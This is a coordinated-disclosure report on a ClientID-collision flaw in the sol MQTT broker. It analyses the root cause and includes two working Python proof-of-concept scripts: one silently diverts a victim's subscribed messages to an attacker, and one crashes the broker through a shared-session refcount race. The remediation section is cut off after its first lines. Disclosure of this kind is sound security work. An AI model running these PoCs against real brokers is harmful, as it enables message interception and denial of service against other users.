ClientID-collision silent subscription/message hijack and shared-session remote crash

## Executive Summary

The **sol** MQTT broker (self-identified as MQTT 3.1.1, `sol.c:62`) fails to disconnect an existing client when a second connection reuses the same ClientID, in violation of the binding MQTT 3.1.1 requirement **[MQTT-3.1.4-2]** ("the Server MUST disconnect the existing Client"). Because sol inserts into `uthash` without a duplicate-key check and routes publishes by first-match bucket lookup, an attacker who knows or guesses a victim's ClientID can (a) **silently receive every message subsequently published to the victim's subscribed topics** while the victim's connection stays open and receives nothing, and (b) trigger a **remote crash** (a `ref_dec` on a NULL inflight-packet pointer in the shared session, loosely a use-after-free-class refcount bug) that takes down the entire single-process broker for every connected client. Both consequences reproduce over the network with two client connections plus a publisher; under the default `allow_anonymous=true` configuration no credentials are required.

[poc.zip](https://github.com/user-attachments/files/29039579/poc.zip)

## Metadata

| Field | Value |
|---|---|
| **Affected product** | sol MQTT broker — version **0.18.5** (and, in all likelihood, every release that carries this `connect_handler` / shared-session design) |
| **Component** | Connection & session management — `connect_handler` (`src/handlers.c`), `publish_message`, ack handlers, inflight-retry cron (`src/server.c`), `struct client_session` (`src/sol_internal.h`) |
| **Authentication** | **Pre-auth** under the compiled default `allow_anonymous=true` (`config.c:368`). With authentication enabled, any single valid low-privilege account suffices to intercept/crash other clients. |
| **Embargo / coordinated disclosure** | Target disclosure window: 90 days from first contact; exact public-disclosure date to be agreed with the maintainer |
| **Status** | Coordinated / responsible disclosure — not yet public |

---

## Affected versions & configuration

- **Version**: sol **0.18.5** (set in `CMakeLists.txt:4`), C, source root `src/`.
- **Protocol**: MQTT **3.1.1** — `sol.c:62` prints `Sol v%s MQTT broker 3.1.1`; `README.md:8` advertises "almost all MQTT v3.1.1 commands". The CONNECT unpacker never inspects the protocol-level byte (`mqtt.c:223-227` skips straight past it), and no v5.0 property/reason-code path exists anywhere in `src/`. The binding bar for this implementation is therefore the **MQTT 3.1.1** spec, with v5.0 cited only as context.
- **Configuration**:
  - `allow_anonymous = true` is the compiled-in default (`config.c:368` in `config_set_default()`); it is flipped to `false` only by an explicit config line equal to the string `"false"` (`config.c:246-251`). Under the default the issue is **pre-auth**.
  - The crash race requires a non-zero worker-thread pool: **`THREADSNR = 2`** is the default (`server.h:39`), so the race is present in default builds. With `THREADSNR == 0` the hijack still occurs but the concurrent-`ref_dec` crash is not reachable (single-threaded serialisation).
- **Most likely all prior versions** with this `connect_handler` / shared-session design are affected; we have only independently verified 0.18.5.

---

## Technical overview

A single missing control — disconnecting the existing live connection on a duplicate-ClientID CONNECT — yields two distinct, both-network-observable consequences:

1. **Silent subscription/message-stream interception.** When a second CONNECT arrives with a ClientID already present in `server.clients_map`, sol leaves the original connection alive and *prepends* the new client into the same uthash bucket. `publish_message` resolves subscribers via first-match bucket lookup, so the **most-recently-added** connection (the attacker) receives subsequent PUBLISHes for that ClientID/session for as long as it stays at the head of the bucket chain, while the still-connected victim silently receives nothing. The victim's connection is never closed and no error is signalled to it, so the interception is invisible.

2. **Remote crash DoS.** With `clean_session=false`, the second CONNECT also **reuses the victim's `struct client_session` by pointer** with no session-level lock. The inflight-retry cron (`inflight_msg_check`, registered every 1 s, re-sending anything held > 20 s) iterates *all* clients including both colliding entries and operates concurrently on the shared session's `i_msgs[]` / refcounts across the two worker threads. A PUBACK clearing an inflight slot on one connection can race against a duplicate/cron-driven clear on the other, producing a `ref_dec` on a `NULL` packet pointer and a SEGV that aborts the whole broker.

---

## Root cause analysis

### 1. The "kick out" comment is dead code; no existing connection is ever closed.

`connect_handler` carries an aspirational comment but performs no eviction:

```c
/* handlers.c:390-393 */
/*
 * Add the new connected client to the global map, if it is already
 * connected, kick him out accordingly to the MQTT v3.1.1 specs.
 */
```

The code below it looks up only the **session** table and never the live-connection table:

```c
/* handlers.c:400-405 */
HASH_FIND_STR(server.sessions, cc->client_id, cc->session);
if (cc->session && c->bits.clean_session == true)
    HASH_DEL(server.sessions, cc->session);     /* removes only the SESSION entry */
else if (cc->session)
    session_present = 1;                        /* session-reuse branch */
```

`server.sessions` is the **session store**; the live connections live in `server.clients_map`. There is **no `HASH_FIND_STR` on `server.clients_map` anywhere in `connect_handler`** — the only such lookup in the file is in `publish_message` (`handlers.c:167`). There is **no `client_deactivate()` call and no DISCONNECT send** on the colliding path. The `client_deactivate()` call sites are exclusively on a client's own read-error/disconnect teardown (`server.c:709/833/884`), and the only `HASH_DEL(server.clients_map, ...)` lives inside `client_deactivate` (`server.c:441`), never on connect. So the pre-existing connection stays authenticated and online (its `online` flag, set at `client_init`/accept in `server.c:383`, is cleared only in its own `client_deactivate` at `server.c:425`).

The session-HASH_DEL at line 403 and the `session_present=1` at line 405 touch only the session table, never the live socket.

### 2. Duplicate ClientID keys coexist in `clients_map`.

```c
/* handlers.c:425 */
HASH_ADD_STR(server.clients_map, client_id, cc);   /* unconditional */
```

This call is guarded only by the global `mutex` (taken at `handlers.c:397`), not by any duplicate-key check. sol's bundled uthash does **not** deduplicate: `HASH_ADD_TO_BKT` (`src/uthash.h:869-884`) merely prepends `addhh` to the bucket's `hh_head` list with no key-equality check, and `HASH_ADD_TO_TABLE` (`uthash.h:376-385`) likewise enforces no uniqueness. Two `struct client` entries with identical `client_id` therefore coexist.

### 3. The colliding CONNECT reuses the victim's session by pointer.

On the `clean_session=false` collision path, the session-reuse branch is taken and allocation is skipped:

```c
/* handlers.c:416 */
if (c->bits.clean_session == true || !cc->session) {
    cc->session = client_session_alloc(cc->client_id);   /* NOT taken on reuse */
    ...
}
```

Since `cc->session` was already populated by the `HASH_FIND_STR` at line 400, the new client's `cc->session` ends up pointing to the **same** `struct client_session` the already-connected victim is using. Three references to one struct now coexist: the `server.sessions` uthash entry, the victim's `c->session`, and the attacker's `cc->session`. No deep copy occurs. `session_present=1` (`handlers.c:405`) is later passed to `set_connack` (`handlers.c:471`) as the CONNACK Session-Present flag (`set_connack` writes `0 | (sp & 0x1) << 0`, `handlers.c:311`) — observed as `SP=1` in the PoC.
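
The aliasing described above can be illustrated with a small Python model of the lookup-then-maybe-allocate logic. This is a sketch, not sol's code: the `Session` and `Client` classes and the `sessions` dict are hypothetical stand-ins for `struct client_session`, `struct client` and `server.sessions`, and it assumes the elided body of the allocation branch stores the fresh session in the session table.

```python
class Session:
    def __init__(self, session_id):
        self.session_id = session_id
        self.i_msgs = {}                  # packet id -> inflight packet


class Client:
    def __init__(self, client_id, clean_session):
        self.client_id = client_id
        self.clean_session = clean_session
        self.session = None


sessions = {}                             # stand-in for server.sessions


def connect(client):
    """Model of handlers.c:400-416; returns the CONNACK Session-Present flag."""
    session_present = 0
    client.session = sessions.get(client.client_id)        # HASH_FIND_STR
    if client.session is not None and client.clean_session:
        del sessions[client.client_id]                     # session entry only
    elif client.session is not None:
        session_present = 1                                # session-reuse branch
    if client.clean_session or client.session is None:
        # Assumed behaviour of the elided branch body: allocate and store.
        client.session = Session(client.client_id)
        sessions[client.client_id] = client.session
    return session_present


victim = Client("victim-device-001", clean_session=False)
attacker = Client("victim-device-001", clean_session=False)
sp_victim = connect(victim)               # first CONNECT allocates
sp_attacker = connect(attacker)           # colliding CONNECT reuses
shared = victim.session is attacker.session
```

In this model the second `connect` returns Session-Present 1 and both clients hold the same `Session` object, which matches the `SP=1` seen in the PoC. Nothing in the lookup asks whether another connection is still using the session.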

### 4. Routing uses first-match bucket lookup → newest connection wins.

```c
/* handlers.c:167 */
HASH_FIND_STR(server.clients_map, s->session_id, sc);
```

`HASH_FIND_STR` → `HASH_FIND` → `HASH_FIND_BYHASHVALUE` → `HASH_FIND_IN_BKT` (`src/uthash.h:846-866`) walks the bucket chain from `hh_head` and **breaks on the first key match** (`uthash.h:853-857`). Because `HASH_ADD_TO_BKT` prepends (`uthash.h:873-878`), `hh_head` is the most-recently-added entry. Both connections hash to the same bucket (identical key string), so the lookup returns the **attacker** (B, added second). This is why subsequent PUBLISHes for that ClientID are delivered to the attacker and not to the victim.

(Clarifying "head": here "head" means the bucket's `hh_head`, set by prepend = most-recently-added — not the global uthash list head, which `HASH_APPEND_LIST` appends to. The publish-routing path uses the bucket chain, so "most-recently-added" is the right description.)
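
A toy model of a single bucket chain makes the "newest wins" behaviour concrete. The `Bucket` class below is hypothetical and only mirrors the two properties cited from `uthash.h` (prepend on add, stop at first match on find); it is not uthash itself.

```python
class Bucket:
    """One bucket chain; index 0 plays the role of hh_head."""

    def __init__(self):
        self.chain = []

    def add(self, key, value):
        # Like HASH_ADD_TO_BKT: prepend, with no key-equality check.
        self.chain.insert(0, (key, value))

    def find(self, key):
        # Like HASH_FIND_IN_BKT: walk from the head, stop at the first match.
        for k, v in self.chain:
            if k == key:
                return v
        return None


bucket = Bucket()
bucket.add("victim-device-001", "A (victim)")
bucket.add("victim-device-001", "B (attacker)")

entries = len(bucket.chain)                     # both entries coexist
winner = bucket.find("victim-device-001")       # the newest entry is returned

bucket.chain.reverse()                          # what an order reversal would do
winner_after_reversal = bucket.find("victim-device-001")
```

Two entries with the same key coexist and the lookup returns B. The last two lines show why the winner is a property of chain order rather than of the key: if the chain order were reversed, the same lookup would return A.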

### 5. No session-level lock; the shared session is mutated concurrently.

`struct client_session` (`sol_internal.h:225-244`) has **no `pthread_mutex_t` member** — only `UT_hash_handle hh` and `struct ref refcount`. The per-client lock lives on `struct client` (`sol_internal.h:208`), not the session. The ack handlers that DECREF inflight packets lock only the calling client's mutex:

```c
/* handlers.c:791, 793-794 */
pthread_mutex_lock(&c->mutex);
...
inflight_msg_clear(&c->session->i_msgs[pkt_id]);   /* DECREF(packet) then ... */
c->session->i_msgs[pkt_id].packet = NULL;          /* ... clears the slot */
```

`pubcomp_handler` (`handlers.c:839-855`, DECREF at line 848) follows the same single-`c->mutex` pattern. Because `c1->session == c2->session` but `c1->mutex != c2->mutex`, two threads can mutate the same `i_msgs[]` / `i_acks[]` / `inflights` / `next_free_mid` with no lock in common.

**Precision on locking asymmetry (important):** the *publish side* of these mutations **is** guarded — `publish_message` takes the global `mutex` (`handlers.c:152`), which covers `next_free_mid()` (line 189) and the inflight writes (lines 202-204 offline / 216-218 online). The **ack side** (`puback`/`pubcomp`) takes only `c->mutex`, **not** the global `mutex`. (Note: `pubrec_handler` at `handlers.c:803-820` does take `c->mutex` at line 809, but its only shared-session write — `c->session->i_acks[pkt_id] = time(NULL)` at line 817 — sits *outside* that lock; it does not mutate `i_msgs[]` and does not DECREF, so it is the weakest example of the pattern.) The hazard is the missing lock shared between `c1->mutex` and `c2->mutex`, combined with the ack side bypassing the global lock that protects the publish side. That asymmetry, plus the absence of any session-level lock, is the real root cause.
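
The following Python sketch models why two per-connection locks give no mutual exclusion over one shared session, and what a second clear of the same slot does. All class and function names are hypothetical; `AttributeError` on `None` stands in for `ref_dec` on a NULL packet pointer. The two clears run back to back so the example stays deterministic, so it does not reproduce the timing of the real race.

```python
import threading


class Packet:
    def __init__(self):
        self.refcount = 1


class Session:
    def __init__(self):
        self.i_msgs = {1: Packet()}       # one inflight slot, packet id 1


class Client:
    def __init__(self, session):
        self.mutex = threading.Lock()     # per-connection lock (struct client)
        self.session = session            # shared by pointer after a collision


def puback(client, pkt_id):
    """Ack path model: lock only the caller's mutex, DECREF, clear the slot."""
    with client.mutex:
        packet = client.session.i_msgs[pkt_id]
        packet.refcount -= 1              # fails if the slot is already None
        client.session.i_msgs[pkt_id] = None


shared = Session()
a, b = Client(shared), Client(shared)

# Holding A's mutex does not prevent anyone from taking B's mutex.
a.mutex.acquire()
b_lock_was_free = b.mutex.acquire(blocking=False)
b.mutex.release()
a.mutex.release()

puback(a, 1)                              # first clear succeeds
try:
    puback(b, 1)                          # second clear hits the empty slot
    second_clear = "ok"
except AttributeError:
    second_clear = "null-deref analogue"
```

A single lock owned by the session, taken by every path that touches `i_msgs`, would make the check-and-clear step atomic across both connections.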

### 6. The inflight-retry cron is the path that hits both colliding connections.

```c
/* server.c:327-330 */
// TODO remove 20 hardcoded value
...
if (c->session->i_msgs[i].packet &&
    (now - c->session->i_msgs[i].seen) > 20) {
```

The cron is registered to fire every 1 second:

```c
/* server.c:937 */
ev_register_cron(&ctx, inflight_msg_check, NULL, 1, 0);
```

Critically, `inflight_msg_check` iterates clients with **`HASH_ITER`** (`server.c:319`), which visits **every** entry — including **both** colliding entries with the duplicate ClientID. The publish-routing path, by contrast, uses `HASH_FIND_STR` (first-match only) and thus funnels traffic to a single connection. This routing-vs-cron iteration difference is precisely why the **20 s-retry cron path — and only it** — concurrently replays the shared `i_msgs[]`, creating the double-`ref_dec` / NULL-packet window that crashes the broker. This also explains why naive high-throughput stress (routing-funnelled) does not crash, while the deliberate unacked-inflight + takeover sequence does.
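
As a rough illustration of the iteration difference, the sketch below models the cron's scan as a loop over every map entry with the `> 20` second predicate quoted above. The data layout (a list of `(connection, session)` pairs and dict-based slots) is invented for the example and is not sol's.

```python
RETRY_AFTER_S = 20        # the hardcoded threshold quoted from server.c


def due_retries(clients, now):
    """Visit every entry, duplicates included, and list slots due for retry."""
    work = []
    for conn_name, session in clients:
        for pkt_id, slot in session.items():
            if slot["packet"] is not None and (now - slot["seen"]) > RETRY_AFTER_S:
                work.append((conn_name, pkt_id))
    return work


# One shared session, reachable through both colliding connections.
shared_session = {7: {"packet": b"hold-7", "seen": 100}}
clients = [("B (attacker)", shared_session), ("A (victim)", shared_session)]

at_20s = due_retries(clients, now=120)    # exactly 20 s old: not yet due
at_22s = due_retries(clients, now=122)    # 22 s old: due on both connections
```

At 22 seconds the same slot appears twice in the work list, once per colliding connection, whereas a first-match lookup would only ever reach one of them. The strict `>` comparison is also why the crash PoC waits 22 seconds rather than 20.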

---

## Specification context

sol is an MQTT **3.1.1** broker. The binding obligation it violates is the OASIS MQTT 3.1.1 normative statement **[MQTT-3.1.4-2]** (the same collision rule carries a different ID in v5.0; see the numbering correction later in this section):

> **MQTT 3.1.1 §3.1.4 [MQTT-3.1.4-2]:** "If the ClientID represents a Client already connected to the Server then the Server **MUST disconnect the existing Client** [MQTT-3.1.4-2]."

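sol does not comply: on a duplicate ClientID it never closes the pre-existing live connection. (In MQTT 3.1.1, DISCONNECT is a client-to-server packet only, so closing the Network Connection is how a 3.1.1 server disconnects a client.)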

For informational context, MQTT **v5.0** strengthens the same obligation (and assigns it a **different** normative ID, **[MQTT-3.1.4-3]**, *not* [MQTT-3.1.4-2]). From the v5.0 spec text:

> §3.1.4 "CONNECT Actions", lines 4760-4765: "If the ClientID represents a Client already connected to the Server, the Server sends a DISCONNECT packet to the existing Client with Reason Code of **0x8E (Session taken over)** as described in section 4.13 and **MUST close the Network Connection of the existing Client [MQTT-3.1.4-3]**."

> Normative-statement table (lines 12316-12324) restates [MQTT-3.1.4-3] verbatim.

> Reason-code definition (line 9211): "142  **0x8E**  Session taken over  Server  Another Connection using the same ClientID has connected causing this Connection to be closed."

**Numbering correction (please cite carefully):** the two specs use different IDs for the collision rule. In **MQTT 3.1.1** it is **[MQTT-3.1.4-2]**; in **MQTT v5.0** the collision/takeover rule is **[MQTT-3.1.4-3]** — v5.0's [MQTT-3.1.4-2] is a *different* statement about authentication/authorization checks (`MQTT-v5.0.txt:4749` / 12308-12314). Because sol is a 3.1.1 broker, the **binding** requirement it fails is the 3.1.1 [MQTT-3.1.4-2] "MUST disconnect the existing Client". The v5.0 [MQTT-3.1.4-3] 0x8E-DISCONNECT requirement is **informational context** showing how the obligation is strengthened in the newer spec; it is not a normative bar that a 3.1.1-only implementation is held to (sol already fails the lower 3.1.1 bar by leaving the old connection live).
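
For context only, this is roughly what the v5.0 takeover notification looks like on the wire, next to the 3.1.1 DISCONNECT that the PoCs send as clients. It is a sketch under the assumption that the v5.0 Property Length may be omitted when the Remaining Length is below 2; the helper names are made up, and sol implements neither helper.

```python
SESSION_TAKEN_OVER = 0x8E                 # decimal 142 in the v5.0 reason-code table


def v5_disconnect(reason_code):
    """Minimal MQTT v5.0 DISCONNECT: type 14, Remaining Length 1, Reason Code."""
    return bytes([0xE0, 0x01, reason_code])


def v311_client_disconnect():
    """MQTT 3.1.1 DISCONNECT: type 14, Remaining Length 0 (client to server)."""
    return bytes([0xE0, 0x00])


takeover = v5_disconnect(SESSION_TAKEN_OVER)
```

The 3.1.1 form carries no reason code at all, which is one reason the v5.0 text can only be informational for a 3.1.1-only broker.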

---

## Impact

- **Confidentiality (High).** The victim's entire subsequent subscribed-topic message stream is silently diverted to the attacker. The PoC shows that after the attacker's collision CONNECT, the victim receives nothing (`CLAIM3: A msgs=[]`) while the attacker receives every PUBLISH (`CLAIM2: B msgs=[b'hijacked-2']`). For IoT deployments where ClientIDs are frequently fixed/guessable device identifiers, this is a full-stream disclosure.

- **Integrity (High).** The attacker becomes a silent MITM on the victim's stream — able to swallow, forge, or replay commands destined for IoT devices. Separately, the shared-session race corrupts the victim's `next_free_mid` / `i_msgs[]` / `i_acks[]` / `inflights` state, so even non-intercepted traffic is at risk of misdelivery or silent loss.

- **Availability (High).** The concurrent double-clear of a shared inflight slot drives `ref_dec` on a `NULL` packet pointer (`SEGV on unknown address 0x80 (WRITE, zero page)` in `ref_dec` at `ref.h:52`, reached via `puback_handler` at `handlers.c:793`). This is a **structural** null/UAF dereference that will SIGSEGV a release build as well — it is **not** an ASan-only artifact; ASan merely makes reproduction reliable. Because sol is a single process with no SIGSEGV handler, the crash takes the broker down for **every** connected client.

- **Stealth.** sol never closes the displaced client's connection, and as a 3.1.1 broker it has no v5.0-style 0x8E "Session taken over" DISCONNECT to send, so the victim's connection shows no sign of having been taken over: its keepalive PINGREQ/PINGRESP still round-trips (PoC `CLAIM1`). Detection by the victim requires correlating a silent drop in message delivery with a takeover event, which is impractical in normal telemetry.

- **Exploitability framing.** The hijack is low-complexity and reliable at normal connection counts. The crash is timing-gated but the window is **fully attacker-controlled** (the attacker chooses PUBACK cadence and the takeover instant), so it does not rise to AC:H; note that bare high-throughput stress (~1.1M messages) does *not* crash because routing funnels traffic to a single connection and starves the concurrent-ack condition — the reliable trigger is the deliberate unacked-inflight + takeover sequence shown in the crash PoC.

---

## Proof of Concept

All PoCs are bare MQTT 3.1.1 over plain TCP; no third-party Python dependencies. They target `127.0.0.1:1884` against `sol_bin` (hijack) or `sol_asan` (crash). Files live in-tree at `poc/`.

### Build & run

```bash
cd /path/to/sol
# Release build (for the hijack PoC):
cmake -B build-release && cmake --build build-release -- -j
# ASan/UBSan build (for the crash PoC):
cmake -B build-debug -DDEBUG=ON && cmake --build build-debug -- -j

# Run the broker with the minimal plain-TCP config (omits cafile so tls=false),
# binding 127.0.0.1:1884, and record its PID for the crash PoC's watchdog:
./build-debug/sol -c sol_poc.conf & echo $! > /tmp/sol_asan.pid

# Hijack (7/7):
python3 mqtt004_hijack.py
# Crash (~40 s; tail the broker's stderr or check exit code):
python3 mqtt004_cron_race.py
```

### PoC 1 — silent subscription/message hijack (`mqtt004_hijack.py`)

Minimal reproducer (self-contained; verbatim from the verified file):

```python
#!/usr/bin/env python3
"""MQTT_004 PoC - ClientID-collision subscription/message hijack against sol.
Bucket-A (fully network-observable). Raw MQTT 3.1.1 over plain TCP, no deps."""
import socket, struct, time, sys

HOST, PORT = "127.0.0.1", 1884
VICTIM_ID = "victim-device-001"
TOPIC = "secret/sensor/data"

def rl(n):
    out = bytearray()
    while True:
        b = n % 128; n //= 128
        if n: b |= 128
        out.append(b)
        if not n: break
    return bytes(out)

def s16(s):
    b = s.encode() if isinstance(s, str) else s
    return struct.pack("!H", len(b)) + b

def pkt(typ, flags, payload):
    return bytes([((typ & 0xF) << 4) | (flags & 0xF)]) + rl(len(payload)) + payload

def connect(client_id, clean=True, keepalive=60, username=None, password=None):
    vh = s16("MQTT") + b"\x04"                 # level 4 == 3.1.1
    flags = 0x02 if clean else 0x00            # bit1 = clean session
    pl = s16(client_id)
    if username is not None: flags |= 0x80; pl += s16(username)
    if password is not None: flags |= 0x40; pl += s16(password)
    vh += struct.pack("!BH", flags, keepalive)
    return pkt(1, 0, vh + pl)                  # CONNECT = 1

def subscribe(pktid, topic, qos=0):
    return pkt(8, 0x02, struct.pack("!H", pktid) + s16(topic) + bytes([qos]))

def publish(topic, msg, qos=0, retain=False):
    flags = (qos << 1) | (0x01 if retain else 0x00)
    payload = s16(topic)
    if qos > 0: payload += struct.pack("!H", 1)
    return pkt(3, flags, payload + (msg.encode() if isinstance(msg, str) else msg))

PINGREQ = bytes([0xC0, 0x00])
DISCONNECT = bytes([0xE0, 0x00])

def recvn(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk: raise ConnectionError("peer closed")
        buf += chunk
    return buf

def recv_pkt(sock, timeout=2.0):
    sock.settimeout(timeout)
    try:
        hdr = recvn(sock, 1)
    except socket.timeout:
        return None
    if not hdr: return None
    t = hdr[0] >> 4; flags = hdr[0] & 0xF
    mult = 1; rem = 0; got = 0
    while True:
        b = recvn(sock, 1)[0]; got += 1
        rem += (b & 0x7F) * mult
        if not (b & 0x80): break
        mult *= 128
        if got > 4: return None
    payload = recvn(sock, rem) if rem else b""
    return (t, flags, payload)

def drain(sock, t=0.4):
    out = []
    while True:
        p = recv_pkt(sock, timeout=t)
        if p is None: break
        out.append(p)
    return out

def parse_publish(payload):
    tlen = struct.unpack("!H", payload[:2])[0]
    topic = payload[2:2 + tlen].decode(errors="replace")
    msg = payload[2 + tlen:]
    return topic, msg

def main():
    results = []
    def check(name, cond, detail=""):
        results.append((name, cond, detail))
        print(f"  [{'PASS' if cond else 'FAIL'}] {name}" + (f"  - {detail}" if detail else ""))

    # A: victim - clean=False so session is reused on collision
    A = socket.create_connection((HOST, PORT))
    A.sendall(connect(VICTIM_ID, clean=False))
    ack = recv_pkt(A)
    check("A CONNECT accepted", ack and ack[0] == 2 and ack[2][1] == 0,
          f"CONNACK rc={ack[2][1] if ack else 'none'}")
    A.sendall(subscribe(1, TOPIC, 0))
    suback = recv_pkt(A)
    check("A SUBSCRIBE acked", suback and suback[0] == 9,
          f"SUBACK granted={list(suback[2][2:]) if suback else 'none'}")

    # Publisher P
    P = socket.create_connection((HOST, PORT))
    P.sendall(connect("publisher-X", clean=True)); recv_pkt(P)

    # Baseline: A should get a publish before the hijack
    P.sendall(publish(TOPIC, "baseline-1")); time.sleep(0.4)
    base_recv = [p for p in drain(A) if p[0] == 3]
    check("baseline: A receives PUBLISH before hijack",
          any(parse_publish(p[2])[1] == b"baseline-1" for p in base_recv),
          f"{len(base_recv)} publish(es) on A")

    # Attacker B: SAME ClientID, clean=False -> reuses A's session
    B = socket.create_connection((HOST, PORT))
    B.sendall(connect(VICTIM_ID, clean=False))
    back = recv_pkt(B)
    check("B CONNECT accepted (collision)", back and back[0] == 2 and back[2][1] == 0,
          f"CONNACK rc={back[2][1] if back else 'none'}, SP={back[2][0] if back else '?'}")

    # CLAIM1: A still alive after takeover (sol did NOT close it)
    time.sleep(0.5); A.sendall(PINGREQ); pr = recv_pkt(A, timeout=2.0)
    check("CLAIM1: A still alive after takeover (sol did NOT close it)",
          pr is not None and pr[0] == 13,                       # 13 == PINGRESP
          "PINGRESP received" if pr and pr[0] == 13 else
          (f"got type={pr[0]}" if pr else "no response (closed?)"))

    # CLAIM2/3: who gets the post-takeover publish?
    P.sendall(publish(TOPIC, "hijacked-2")); time.sleep(0.6)
    a_msgs = [parse_publish(p[2])[1] for p in drain(A, 0.4) if p[0] == 3]
    b_msgs = [parse_publish(p[2])[1] for p in drain(B, 0.4) if p[0] == 3]
    check("CLAIM2: attacker B receives the post-takeover PUBLISH",
          any(m == b"hijacked-2" for m in b_msgs), f"B msgs={b_msgs}")
    check("CLAIM3: victim A does NOT receive the post-takeover PUBLISH",
          not any(m == b"hijacked-2" for m in a_msgs), f"A msgs={a_msgs}")

    print("\n=== SUMMARY ===")
    for n, c, _ in results: print(f"  {'OK' if c else 'XX'} {n}")
    # The verdict rests on CLAIM1-3, i.e. checks 4..6; a [6:] slice would test CLAIM3 alone.
    hijack = all(c for _, c, _ in results[4:])
    print(f"\nVERDICT: MQTT_004 hijack {'CONFIRMED' if hijack else 'NOT confirmed'} "
          f"({sum(c for _,c,_ in results)}/{len(results)} checks passed)")

    try:
        B.sendall(DISCONNECT); B.close()
        A.sendall(DISCONNECT); A.close()
        P.sendall(DISCONNECT); P.close()
    except OSError:
        pass

if __name__ == "__main__":
    try:
        main()
    except (ConnectionError, OSError) as e:
        print(f"ERROR connecting to sol @ {HOST}:{PORT}: {e}", file=sys.stderr)
        sys.exit(2)
```

**Observed output (two independent clean runs, identical):**

```
[PASS] A CONNECT accepted — CONNACK rc=0
[PASS] A SUBSCRIBE acked — SUBACK granted=[0]
[PASS] baseline: A receives PUBLISH before hijack — 1 publish(es) on A
[PASS] B CONNECT accepted (collision) — CONNACK rc=0, SP=1     ← SP=1 confirms session-reuse branch
[PASS] CLAIM1: A still alive after takeover (sol did NOT close it) — PINGRESP received
[PASS] CLAIM2: attacker B receives the post-takeover PUBLISH — B msgs=[b'hijacked-2']
[PASS] CLAIM3: victim A does NOT receive the post-takeover PUBLISH — A msgs=[]
VERDICT: MQTT_004 hijack CONFIRMED (7/7)
```

> Note: the broker may also abort during the PoC's DISCONNECT teardown (`aborted (core dumped)` was observed at the kill/wait line in two runs). This is a **third symptom** of the same shared-session/refcount bug, consistent with the cron-race crash shown in PoC 2, and is triggered when A and B both tear down the same `client_session`. The 7 hijack assertions do not depend on this crash; it is an additional crash vector, not a flaw in the demonstration.

### PoC 2 — remote crash via shared-session refcount race (`mqtt004_cron_race.py`)

Scenario: A (`clean=false`) subscribes at QoS1; the publisher P sends 39 QoS1 PUBLISHes that A does **not** ack (they stay inflight in the shared session's `i_msgs`); wait 22 s so sol's 20 s inflight-retry cron (`server.c:329-330`) is armed; then attacker B connects with the same ClientID (session reuse). The cron's `HASH_ITER` now visits **both** A and B (duplicate keys) and concurrently operates on the same `i_msgs[]`/refcounts across the two worker threads (`THREADSNR=2`). B's PUBACK of a dup retry racing with A's cron retry on the same slot drives `ref_dec` on a `NULL` packet pointer → SEGV.

Minimal harness (verbatim from the verified file; it imports codec helpers from `mqtt004_race.py`):

```python
import socket, struct, time, sys
sys.path.insert(0, '.')
from mqtt004_race import connect, subscribe, publish_qos1, recv_pkt, recvn, rl, s16, pkt
HOST, PORT = "127.0.0.1", 1884
VID = "victim-cron-001"; TOPIC = "secret/cron"

def conn(cid, clean=True):
    s = socket.create_connection((HOST, PORT))
    s.sendall(connect(cid, clean)); recv_pkt(s, 2); return s

A = conn(VID, False); A.sendall(subscribe(1, TOPIC, 1)); recv_pkt(A, 2)
P = conn("pub-cron", True)
# Send QoS1 publishes; A will NOT ack -> they stay inflight in the shared session
for m in range(1, 40):
    P.sendall(publish_qos1(TOPIC, f"hold-{m}", m))
print("sent 39 unacked qos1 -> inflight in shared session; waiting 22s for >20s retry cron...", flush=True)
time.sleep(22)
# Now attacker B reuses the session; cron HASH_ITER will hit BOTH A and B sharing session
B = conn(VID, False)
print("B connected (collision, session reuse). Watching 15s for crash/corruption...", flush=True)
t0 = time.time(); crash = False
while time.time() - t0 < 15:
    if not __import__('os').path.exists(f"/proc/{open('/tmp/sol_asan.pid').read().strip()}"):
        crash = True; break
    # B acks whatever dup retries it gets, racing with A's cron retries on shared i_msgs
    try:
        p = recv_pkt(B, 0.3)
        if p and p[0] == 3 and (p[1] & 0x06):
            pl = p[2]; tl = struct.unpack("!H", pl[:2])[0]
            mid = struct.unpack("!H", pl[2 + tl:4 + tl])[0]
            B.sendall(pkt(4, 0, struct.pack("!H", mid)))   # PUBACK
    except (socket.timeout, ConnectionError, OSError):
        pass
print("CRASHED" if crash else "no crash in window")
for s in (A, B, P):
    try: s.close()
    except: pass
```

> **Harness caveat (does not affect the bug's validity):** the in-process `/proc/PID` watchdog can be defeated if the Python client itself first trips `struct.error: unpack requires a buffer of 2 bytes` on a short/malformed dup retry it receives on B. The harness's `except` clause covers only socket errors, so `struct.error` propagates and ends the script before the watchdog fires. The broker **does** still crash, as confirmed by the broker's stderr log, which contains the full ASan SEGV trace and `==ABORTING==`, and by `kill -0` showing the process dead. For reliable reporting, harden the harness by also catching `struct.error` around the recv/parse so that short/malformed re-sends are ignored, or simply tail the broker's stderr / exit code. The PID file `/tmp/sol_asan.pid` must be written by the launcher (or the harness needs a fallback), since the watchdog reads it.
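
One possible hardening, sketched under the assumption of a POSIX host: a bounds-checked packet-id extractor that returns `None` on truncated PUBLISH payloads instead of raising, and a `kill -0` style liveness check. Both helper names are hypothetical and are not part of the shipped PoC files.

```python
import os
import struct


def publish_packet_id(flags, payload):
    """Return the packet id of a QoS>0 PUBLISH, or None if QoS 0 or truncated."""
    if not (flags & 0x06):                # QoS bits clear: no packet id present
        return None
    if len(payload) < 2:                  # topic length field missing
        return None
    topic_len = struct.unpack("!H", payload[:2])[0]
    end = 2 + topic_len + 2               # topic length + topic + packet id
    if len(payload) < end:
        return None
    return struct.unpack("!H", payload[2 + topic_len:end])[0]


def broker_alive(pid):
    """Python equivalent of `kill -0 PID`: True while the process exists."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True                       # exists but is owned by another user
    return True


# Example: a QoS1 PUBLISH on "secret/cron" with packet id 5, then a cut-off copy.
topic = b"secret/cron"
good = struct.pack("!H", len(topic)) + topic + struct.pack("!H", 5) + b"hold-5"
mid_ok = publish_packet_id(0x02, good)
mid_short = publish_packet_id(0x02, good[:len(topic) + 3])
```

In the harness loop, the PUBACK would then be sent only when `publish_packet_id` returns a value, and the watchdog would call `broker_alive` with a PID read once at start-up.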

---

## Suggested remediation

These are suggestions, not demands. The minimal, spec-aligned fix is the first item; the rest harden the shared-session invariant.

